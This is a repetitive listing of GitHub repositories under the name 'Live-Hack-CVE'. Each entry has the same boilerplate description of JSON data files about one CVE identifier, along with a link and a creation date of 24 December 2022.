**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6755 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6755](https://github.com/Live-Hack-CVE/CVE-2019-6755) create time: 2022-12-24T15:56:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6756 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6756](https://github.com/Live-Hack-CVE/CVE-2019-6756) create time: 2022-12-24T15:55:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6757 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6757](https://github.com/Live-Hack-CVE/CVE-2019-6757) create time: 2022-12-24T15:55:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6758 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6758](https://github.com/Live-Hack-CVE/CVE-2019-6758) create time: 2022-12-24T15:55:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6746](https://github.com/Live-Hack-CVE/CVE-2019-6746) create time: 2022-12-24T15:55:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6759 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6759](https://github.com/Live-Hack-CVE/CVE-2019-6759) create time: 2022-12-24T15:54:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6760 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6760](https://github.com/Live-Hack-CVE/CVE-2019-6760) create time: 2022-12-24T15:54:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6761 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6761](https://github.com/Live-Hack-CVE/CVE-2019-6761) create time: 2022-12-24T15:54:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6762 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6762](https://github.com/Live-Hack-CVE/CVE-2019-6762) create time: 2022-12-24T15:54:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6763 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6763](https://github.com/Live-Hack-CVE/CVE-2019-6763) create time: 2022-12-24T15:54:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16593 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16593](https://github.com/Live-Hack-CVE/CVE-2020-16593) create time: 2022-12-24T15:57:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29651 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29651](https://github.com/Live-Hack-CVE/CVE-2020-29651) create time: 2022-12-24T15:57:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44171 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44171](https://github.com/Live-Hack-CVE/CVE-2021-44171) create time: 2022-12-24T15:53:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0696 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0696](https://github.com/Live-Hack-CVE/CVE-2021-0696) create time: 2022-12-24T15:48:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0951 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0951](https://github.com/Live-Hack-CVE/CVE-2021-0951) create time: 2022-12-24T15:48:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36915 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36915](https://github.com/Live-Hack-CVE/CVE-2021-36915) create time: 2022-12-24T15:47:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38026 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38026](https://github.com/Live-Hack-CVE/CVE-2022-38026) create time: 2022-12-24T15:57:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38027 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38027](https://github.com/Live-Hack-CVE/CVE-2022-38027) create time: 2022-12-24T15:57:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38025 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38025](https://github.com/Live-Hack-CVE/CVE-2022-38025) create time: 2022-12-24T15:57:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38021 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38021](https://github.com/Live-Hack-CVE/CVE-2022-38021) create time: 2022-12-24T15:57:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38017 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38017](https://github.com/Live-Hack-CVE/CVE-2022-38017) create time: 2022-12-24T15:57:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38031 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38031](https://github.com/Live-Hack-CVE/CVE-2022-38031) create time: 2022-12-24T15:57:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38028 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38028](https://github.com/Live-Hack-CVE/CVE-2022-38028) create time: 2022-12-24T15:57:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38039 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38039](https://github.com/Live-Hack-CVE/CVE-2022-38039) create time: 2022-12-24T15:56:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41081 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41081](https://github.com/Live-Hack-CVE/CVE-2022-41081) create time: 2022-12-24T15:56:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41083 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41083](https://github.com/Live-Hack-CVE/CVE-2022-41083) create time: 2022-12-24T15:56:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41042 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41042](https://github.com/Live-Hack-CVE/CVE-2022-41042) create time: 2022-12-24T15:56:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40179 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40179](https://github.com/Live-Hack-CVE/CVE-2022-40179) create time: 2022-12-24T15:56:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38036 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38036](https://github.com/Live-Hack-CVE/CVE-2022-38036) create time: 2022-12-24T15:56:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38040 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38040](https://github.com/Live-Hack-CVE/CVE-2022-38040) create time: 2022-12-24T15:56:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38029 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38029](https://github.com/Live-Hack-CVE/CVE-2022-38029) create time: 2022-12-24T15:56:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40178 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40178](https://github.com/Live-Hack-CVE/CVE-2022-40178) create time: 2022-12-24T15:56:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38030 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38030](https://github.com/Live-Hack-CVE/CVE-2022-38030) create time: 2022-12-24T15:56:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38033 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38033](https://github.com/Live-Hack-CVE/CVE-2022-38033) create time: 2022-12-24T15:56:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38086 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38086](https://github.com/Live-Hack-CVE/CVE-2022-38086) create time: 2022-12-24T15:55:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35297 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35297](https://github.com/Live-Hack-CVE/CVE-2022-35297) create time: 2022-12-24T15:55:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35226 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35226](https://github.com/Live-Hack-CVE/CVE-2022-35226) create time: 2022-12-24T15:55:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38001 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38001](https://github.com/Live-Hack-CVE/CVE-2022-38001) create time: 2022-12-24T15:55:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35296](https://github.com/Live-Hack-CVE/CVE-2022-35296) create time: 2022-12-24T15:55:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38003 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38003](https://github.com/Live-Hack-CVE/CVE-2022-38003) create time: 2022-12-24T15:55:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38016 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38016](https://github.com/Live-Hack-CVE/CVE-2022-38016) create time: 2022-12-24T15:55:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35299 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35299](https://github.com/Live-Hack-CVE/CVE-2022-35299) create time: 2022-12-24T15:55:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37983 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37983](https://github.com/Live-Hack-CVE/CVE-2022-37983) create time: 2022-12-24T15:55:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20351 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20351](https://github.com/Live-Hack-CVE/CVE-2022-20351) create time: 2022-12-24T15:55:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37984 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37984](https://github.com/Live-Hack-CVE/CVE-2022-37984) create time: 2022-12-24T15:54:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37985 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37985](https://github.com/Live-Hack-CVE/CVE-2022-37985) create time: 2022-12-24T15:54:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20165 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20165](https://github.com/Live-Hack-CVE/CVE-2019-20165) create time: 2022-12-24T14:24:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20161 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20161](https://github.com/Live-Hack-CVE/CVE-2019-20161) create time: 2022-12-24T14:24:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20162 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20162](https://github.com/Live-Hack-CVE/CVE-2019-20162) create time: 2022-12-24T14:24:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20170 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20170](https://github.com/Live-Hack-CVE/CVE-2019-20170) create time: 2022-12-24T14:24:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-18447 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-18447](https://github.com/Live-Hack-CVE/CVE-2018-18447) create time: 2022-12-24T15:12:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-18446 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-18446](https://github.com/Live-Hack-CVE/CVE-2018-18446) create time: 2022-12-24T15:12:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6764 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6764](https://github.com/Live-Hack-CVE/CVE-2019-6764) create time: 2022-12-24T15:12:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6743 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6743](https://github.com/Live-Hack-CVE/CVE-2019-6743) create time: 2022-12-24T15:11:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6765 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6765](https://github.com/Live-Hack-CVE/CVE-2019-6765) create time: 2022-12-24T15:11:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6766 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6766](https://github.com/Live-Hack-CVE/CVE-2019-6766) create time: 2022-12-24T15:11:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6767 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6767](https://github.com/Live-Hack-CVE/CVE-2019-6767) create time: 2022-12-24T15:11:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6768 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6768](https://github.com/Live-Hack-CVE/CVE-2019-6768) create time: 2022-12-24T15:11:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6769 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6769](https://github.com/Live-Hack-CVE/CVE-2019-6769) create time: 2022-12-24T15:11:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6770](https://github.com/Live-Hack-CVE/CVE-2019-6770) create time: 2022-12-24T15:11:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6771](https://github.com/Live-Hack-CVE/CVE-2019-6771) create time: 2022-12-24T15:11:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6772 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6772](https://github.com/Live-Hack-CVE/CVE-2019-6772) create time: 2022-12-24T15:11:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6773 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6773](https://github.com/Live-Hack-CVE/CVE-2019-6773) create time: 2022-12-24T15:11:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7275](https://github.com/Live-Hack-CVE/CVE-2019-7275) create time: 2022-12-24T15:11:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7273 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7273](https://github.com/Live-Hack-CVE/CVE-2019-7273) create time: 2022-12-24T15:10:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7274 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7274](https://github.com/Live-Hack-CVE/CVE-2019-7274) create time: 2022-12-24T15:10:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7265 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7265](https://github.com/Live-Hack-CVE/CVE-2019-7265) create time: 2022-12-24T15:10:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7266 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7266](https://github.com/Live-Hack-CVE/CVE-2019-7266) create time: 2022-12-24T15:10:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7267 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7267](https://github.com/Live-Hack-CVE/CVE-2019-7267) create time: 2022-12-24T15:10:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7268 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7268](https://github.com/Live-Hack-CVE/CVE-2019-7268) create time: 2022-12-24T15:10:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7269 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7269](https://github.com/Live-Hack-CVE/CVE-2019-7269) create time: 2022-12-24T15:10:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7270 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7270](https://github.com/Live-Hack-CVE/CVE-2019-7270) create time: 2022-12-24T15:09:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7259 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7259](https://github.com/Live-Hack-CVE/CVE-2019-7259) create time: 2022-12-24T15:09:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7262 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7262](https://github.com/Live-Hack-CVE/CVE-2019-7262) create time: 2022-12-24T15:09:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7261 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7261](https://github.com/Live-Hack-CVE/CVE-2019-7261) create time: 2022-12-24T15:09:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7255 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7255](https://github.com/Live-Hack-CVE/CVE-2019-7255) create time: 2022-12-24T15:09:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7256 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7256](https://github.com/Live-Hack-CVE/CVE-2019-7256) create time: 2022-12-24T15:09:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7257 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7257](https://github.com/Live-Hack-CVE/CVE-2019-7257) create time: 2022-12-24T15:09:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7258 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7258](https://github.com/Live-Hack-CVE/CVE-2019-7258) create time: 2022-12-24T15:09:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9445 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9445](https://github.com/Live-Hack-CVE/CVE-2019-9445) create time: 2022-12-24T15:08:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9453 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9453](https://github.com/Live-Hack-CVE/CVE-2019-9453) create time: 2022-12-24T15:08:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9456 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9456](https://github.com/Live-Hack-CVE/CVE-2019-9456) create time: 2022-12-24T15:08:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14131 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14131](https://github.com/Live-Hack-CVE/CVE-2020-14131) create time: 2022-12-24T15:16:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14129 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14129](https://github.com/Live-Hack-CVE/CVE-2020-14129) create time: 2022-12-24T15:16:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9045 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9045](https://github.com/Live-Hack-CVE/CVE-2020-9045) create time: 2022-12-24T15:13:37Z

